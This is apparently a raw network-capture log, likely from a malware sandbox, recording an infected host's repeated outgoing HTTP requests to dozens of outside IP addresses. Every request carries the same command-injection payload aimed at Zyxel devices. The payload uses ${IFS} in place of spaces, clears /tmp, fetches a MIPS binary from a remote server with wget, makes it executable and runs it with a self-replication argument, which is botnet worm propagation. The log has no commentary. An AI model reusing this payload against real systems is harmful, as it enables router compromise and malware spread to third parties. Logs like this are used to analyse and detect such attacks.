                                            Jan 14, 2024 15:50:35.332793951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3135192.168.2.2334640157.116.72.220443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.332813025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3136192.168.2.2342754196.95.155.239443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.332859039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3137192.168.2.2334044190.210.8.225443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.332879066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3138192.168.2.2357298150.201.211.239443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.332918882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3139192.168.2.235753469.23.136.96443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.332946062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3140192.168.2.2353242221.46.0.164443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.332988024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3141192.168.2.234280097.9.13.92443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.333015919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3142192.168.2.235758259.137.191.162443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.333045006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3143192.168.2.2357238103.25.179.73443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.333154917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3144192.168.2.2358796148.8.27.23443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.333175898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3145192.168.2.2343530124.64.212.100443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.333187103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3146192.168.2.2355050143.162.250.26443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.333214045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3147192.168.2.2333098203.59.133.241443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.333250999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3148192.168.2.235018614.223.20.210443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.333280087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3149192.168.2.2336458155.63.141.20443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.333304882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3150192.168.2.2334480205.80.2.19443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.333343983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3151192.168.2.2353534151.147.118.143443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.333355904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3152192.168.2.234647478.231.52.46443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.333424091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3153192.168.2.2332774194.239.251.192443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.333451986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3154192.168.2.2350732173.188.142.223443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.333458900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3155192.168.2.233577058.143.64.166443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.333494902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3156192.168.2.233887640.141.26.133443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.333544970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3157192.168.2.234178634.30.176.19443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.333583117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3158192.168.2.2333736112.23.48.72443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.333605051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3159192.168.2.233681639.232.186.105443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.333632946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3160192.168.2.2345358203.195.223.183443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.333662033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3161192.168.2.2333118161.133.131.145443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.333682060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3162192.168.2.2347944119.170.16.43443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.333723068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3163192.168.2.2342304216.116.80.196443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.333745003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3164192.168.2.233509257.228.59.223443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.333780050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3165192.168.2.2344692128.234.229.187443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.333802938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3166192.168.2.2352012121.236.181.255443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.333832979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3167192.168.2.2344178166.88.117.24443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.333878994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3168192.168.2.233338213.142.168.201443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.333900928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3169192.168.2.235916814.70.230.153443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.333925009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3170192.168.2.235448289.58.51.135443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.333951950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3171192.168.2.2350812210.32.47.138443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.333981991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3172192.168.2.2339812151.11.167.206443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.334005117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3173192.168.2.233569284.153.197.78443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.334041119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3174192.168.2.2355546100.227.64.245443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.334093094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3175192.168.2.2335158180.70.21.224443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.334125996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3176192.168.2.2335460150.118.183.40443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.334175110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3177192.168.2.2358612101.116.87.235443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.334201097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3178192.168.2.233501646.191.40.105443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.334228039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3179192.168.2.233959644.93.238.248443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.334252119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3180192.168.2.234970461.119.158.145443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.334260941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3181192.168.2.2335554178.171.30.150443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.334295034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3182192.168.2.235841851.68.85.47443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.334347963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3183192.168.2.2357292201.241.149.117443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.334374905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3184192.168.2.2336548144.59.191.141443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.334408045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3185192.168.2.2345126152.100.13.191443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.334417105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3186192.168.2.2349928110.35.230.103443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.334439039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3187192.168.2.2347344199.117.88.240443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.334502935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3188192.168.2.2349342209.95.95.136443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.334532022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3189192.168.2.235073877.7.177.176443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.334567070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3190192.168.2.234426651.165.177.7443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.334593058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3191192.168.2.23330141.176.46.238443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.334618092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3192192.168.2.2351902147.235.36.73443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.334649086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3193192.168.2.234748288.77.189.51443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.334700108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3194192.168.2.235718295.219.247.70443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.334733009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3195192.168.2.2347754110.222.153.234443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.334758997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3196192.168.2.236057887.24.207.120443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.334785938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3197192.168.2.2349450186.64.46.43443
                                            TimestampBytes transferredDirectionData
